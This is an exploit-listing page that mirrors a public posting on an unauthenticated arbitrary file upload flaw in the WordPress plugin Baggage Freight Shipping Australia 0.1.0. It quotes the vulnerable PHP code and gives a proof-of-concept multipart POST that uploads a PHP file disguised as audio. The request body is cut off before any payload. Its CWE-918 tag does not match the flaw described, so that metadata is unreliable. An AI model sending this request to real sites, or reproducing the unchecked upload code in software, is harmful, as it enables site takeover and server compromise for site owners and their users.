Advertisement






WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload

CVE Category Price Severity
N/A CWE-918 N/A High
Author Risk Exploitation Type Date
Not specified High Remote 2018-12-29
CPE
cpe:cpe:/a:wordpress:plugin:baggage_freight_shipping_australia:0.1.0
CVSS EPSS EPSSP
Not provided 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120236

Below is a copy:

WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Exploit Title : WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Exploit Author : The Mechiavellian
Exploit Author Facebook : 
Vendor Homepage || software link : https://wordpress.org/plugins/baggage-freight/
Version : 0.1.0
Unrestricted file upload for unahtorized user in package info upload 

 
>Vulnerable code in upload-package.php:
if($_POST["submit"])
{
    if ($_FILES["file"])
    {
        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
 
        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
 
poc :
 
POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"
 
1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav
 

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.